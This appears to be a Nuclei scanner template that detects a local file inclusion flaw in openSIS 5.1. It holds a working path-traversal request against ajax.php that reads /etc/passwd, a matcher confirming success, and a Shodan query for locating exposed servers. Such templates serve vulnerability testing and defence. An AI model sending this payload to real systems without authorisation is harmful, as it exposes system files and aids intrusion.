id: opensis-lfi

info:
  name: openSIS 5.1 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
  reference:
    - https://www.exploit-db.com/exploits/38039
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
    shodan-query: http.title:"openSIS"
  tags: opensis,lfi,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
      - "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 490a004630440220552bd7a5bd679c8a83d22f7baac91048f75315e670f5f1c8d7ac267057aaa3ee02201338f6a795463b5e1371f0408ded3f16c7e0a329ea7ec550725db0d9117168d1:922c64590222798bb761d5b6d8e72950
